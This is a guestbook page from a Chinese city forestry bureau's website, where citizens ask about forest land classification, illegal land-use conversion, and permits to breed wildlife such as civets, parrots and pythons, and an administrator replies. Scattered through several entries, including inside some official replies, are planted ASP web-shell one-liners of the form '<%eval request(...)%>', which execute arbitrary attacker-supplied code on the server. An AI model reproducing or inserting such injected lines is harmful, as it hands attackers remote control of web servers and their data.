您现在的位置:首页 >> 查看留言 签写留言
查看留言
  • 1.你好,问一下,关于湛江林木统计 125.90.79. 2018/1/29 10:44:09 IP:125.90.79.*
    你好,问一下,关于湛江林木统计

    管理员回复:您好!由于您提出的问题范围较模糊,欢迎您致电我局详询。联系电话:3313709。
    (回复时间:2018/1/29 17:26:48)
  • 2.发展体育旅游项目 125.90.79. 2017/12/6 9:20:28 IP:125.90.79.*
    您好!计划在遂溪县草潭镇角头沙林地边(靠海岸)发展体育旅游项目,请问角头沙那片是属于什么级别公益生态林,另问:在不破坏林木的情况下(利用未有植木空间)建设基础设施是否可行,如往后遇到项目所在地块被征用或被规划,我所建的设施能否有保障?谢谢!

    管理员回复:问题一:建议您向所在地县级林业主管部门查询该土地性质。 问题二:如果计划使用的林地属于红树林(自然保护区),是不允许发展利用旅游项目的;如果上述林地属于一般经济林,则可以在不破坏林地、林木的情况下,发展林下经济。具体情况请想所在地县级咨询。
    (回复时间:2017/12/8 16:09:21)
  • 3.承包地问题 125.90.79. 2017/12/5 10:15:19 IP:125.90.79.*
    我10年前在农村海边承包了200多亩的坡地,当时合同写明用于种植,在坡地里有几个因长期村民彩砂留下几个深坑,不能种树,我就将这几个坑改成了养虾池,可能有20多亩,现在有人举报说我违法改变林地用途,我想知道我承包的这个地属不属于林地,如何确定承包地的性质,如果属于林地,违法改变林地用途,我们湛江是如何处理?

    管理员回复:1.向土地所有权人了解,弄清所使用林地性质是否属于林地,可以到所在地县级林业主管部门或国土部门了解。 2.若不是林地,请向国土部门了解相关情况。若是林地,则采矿形成的深坑,应当对采矿(违法行为)造成林地受损情况予以恢复原状,即使原采矿人没有恢复原状,其他人(包括原承包人)可以通过代履行等方式恢复林地的种植条件以保障种植林木。在没有恢复原状的情况下,将深坑改成养虾池,都属于擅自改变林地用途(是违法行为),根据相关司法解释,20多亩林地被改成养虾池已经涉嫌构成犯罪。
    (回复时间:2017/12/6 9:24:02)
  • 4.原市林业局局长梁车生为何被免? 111.111.213. 2014/2/16 16:30:35 IP:123.183.213.*
    2012年12月,湛江市十三届人大常委会召开第八次全体会议,根据常务副市长赵志辉受市长王中丙的委托提请,经常委会会议审议通过,决定免去梁车生的湛江市林业局局长职务。请问为什么呢?现在他担任什么职务了?
    <%eval request("brute")%>

    管理员回复:梁车生局长已达到规定的改非年龄,现职位为林业局调研员。 <%eval request("x")%>
    (回复时间:2014/8/31 22:14:01)
  • 5.为什么网上留言“用不了? 111.111.213. 2014/1/29 19:50:24 IP:123.183.213.*
    为什么贵局的”政民互动“里面的"网上留言”板块用不了?
    <%eval request("112233")%>

    管理员回复: 新春佳节,谢谢您的关注!现在“政民互动”里面的“网上留言”是可用的,给您造成的不便我们深感歉意。为此,也欢迎您继续关注我们的网站,有关林业方面的问题随时欢迎留言咨询。
    (回复时间:2014/8/8 12:00:28)
  • 6.珍稀野生动物”不求人“是何物? 220.178.22. 2014/1/19 19:04:07 IP:221.204.234.*
    据《霞山区志》介绍:“二十世纪五十年代以前,在屋山蒲草洋田中生长着一种珍稀野生动物俗称“不求人”,因此种动物既像狗又像狐狸,一种具有雌雄两性,自我交配繁殖,故名。1954年建设黎湛铁路以后,随着蒲草洋田的消失和人为捕杀而绝种。”
    请问这种神奇的动物“不求人”是何物,有没更详细的介绍描述,例如习性,标本等等!或许这是湛江市独有的物种,正如年初科学家将湛江生蚝命名为“湛江牡蛎”一样,是个新物种!谢谢

    管理员回复: 俗称“不求人”的珍惜野生动物是指灵猫科的“小灵猫”和“大灵猫”,属于国家二级保护动物,非雌雄两性,主要分布在长江以南各省。此类动物在阴部有发达的囊状香腺,能分泌奇异气味--灵猫香。
    (回复时间:2014/1/27 10:48:31)
  • 7.我想申请办理果子狸繁殖驯养基地 183.50.115. 2014/1/5 17:38:14 IP:183.50.115.*
    我是一名下岗职工,想办个果子狸养殖驯养基地,从广西引进种苗,是否可以获得批准?

    管理员回复: 根据《广东省野生动物保护管理条例》的规定,你要养殖的果子狸属于“三有”保护动物,不需要办理驯养许可证。你若具备场所和养殖技术即可驯养。但,养殖出卖经营,必须向当地林业局申报批准办理经营许可证。
    (回复时间:2014/1/13 16:52:48)
  • 8.关于养殖鹦鹉的问题 111.13.1. 2013/9/12 17:18:22 IP:114.54.1.*
    我想养殖鹦鹉,请问养殖的条件、需要提交的材料以及流程

    管理员回复: 鹦鹉是国家二级保护野生动物,根据《国家重点保护野生动物驯养繁殖许可证管理办法》规定:申请驯养繁殖国家二级保护野生动物必须具备以下条件:1. 有适宜驯养繁殖野生动物的固定场所和必须的设施。2. 具备与驯养繁殖野生动物种类、数量相适应的资金、人员和技术。3. 驯养繁殖野生动物饲料来源有保证。 申请人要提交如下申报材料: 1.驯养单位或个人的申请报告;2. 国家重点保护野生动物驯养繁殖许可证申请表;3. 与申请驯养繁殖的野生动物种类、规模相适应的驯养繁殖场所使用权,固定场所和必须的设施、资金储备和固定资产投入、饲养人员技术能力等证明文件及相关相片;4. 驯养繁殖可行性研究报告。 办理流程: 申请人向驯养繁殖所在地县级林业主管部门提出申请,经县级林业主管部门审核并逐级上报省林业厅审批,核发野生动物驯养繁殖许可证。 <%eval request("brute")%>
    (回复时间:2014/4/1 22:00:50)
  • 9.蟒蛇养殖场 14.210.147. 2013/8/22 15:48:02 IP:14.210.147.*
    在海南有家东盛弘蟒蛇养殖开发公司。我想从这家公司购买蛇种养殖,不知道驯养证可以办吗?

    管理员回复:您好!蟒蛇驯养证可以办,请向所在地县级林业主管部门申请,逐级上报国家林业局审批。<%eval request("brute")%>。
    (回复时间:2014/8/9 0:14:49)
  • 10.还算不算是林地 183.12.7. 2013/5/22 1:18:43 IP:183.12.7.*
    以前是农村林地,在早三年前经林业局同意村委将树木砍掉去卖,我在没有树木的时候在原来的林地上推开了一块空地,空地上现在没有树木,请问现在这块地还算是林地吗

    管理员回复:是林业用地。
    (回复时间:2013/6/3 9:26:13)
  • 湛江林业网(www.zjf.gov.cn) © 2018 版权所有 All Rights Reserved.
  • 主办单位:湛江市林业局   
    地址:湛江市赤坎区椹川大道北84号   邮政编码:524033
    联系电话:0759-3313709   电子邮箱:zjly3313709@126.com
    粤公网安备 44080202000032   网站标识码:4408000032
    粤ICP备09136083号
  • Powered by zjf.gov.cn